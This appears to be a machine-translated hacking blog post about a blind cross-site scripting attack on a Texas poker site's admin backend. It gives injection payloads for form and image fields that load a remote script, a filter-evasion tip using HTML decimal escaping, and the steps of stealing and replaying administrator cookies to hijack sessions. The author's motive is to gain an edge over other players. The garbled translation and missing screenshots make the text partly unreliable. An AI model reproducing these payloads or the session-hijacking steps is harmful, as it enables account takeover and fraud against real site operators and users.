XSS blind Texas poker

0x00Overview
XSS is playing this application for many dicuzs, phpwind, and ssn of Texas poker companies .. It is said that the annual profit is more than million ....
0x01Introduction
Attackers can use xss to steal cookies in the background .. Popular, content may be a bit wordy, forgive me
0x02 configure and compile
An xss script Client

0x03Practical Application
I play the Texas card, but I often play the first place in the game. Haha. Some users in this system are too many, TMD blind so. As a result, I almost lost money every day. Some B spent a lot of money to buy a lot of gold coins... Ah, although it is a game, it is also addictive.
Search Port:

Insert an xss file. when inserting an xss file, you must note that it must be gentle and try to insert it without damaging the form display ..
You can simulate and write the code locally. For example, if the property text appears here, we 'd better not use xss. "/> <script src = url. js> </script> <.... this conventional writing method directly writes the <script src = url. js> </script>.

Text is inserted into the database, and reading is usually directly read. Few background data reading from the database is also filtered...

For the img label, you can "/> <script src = url. js> </script> <.. to ensure that the image is not displayed in the X box, we recommend that you upload a picture to get the address: Image address .jpg "/> <script src = url. js> </script> ..

That's perfect.

However, some people have asked that the insert in the form becomes <script src = url. js> </script> before "/>, how can I submit the following content.

Here we need code, recommended http://app.baidu.com/app/enter? Appid = 280383 html decimal escape, it is included.
After the submission is successful, wait for the fish to hook up:

In a short time .. :

Then, the chrome cookie simulator adds the cookie:

So far it has come to an end. Conclusion: Do not stick to the blind plug, type = hidden attribute more attention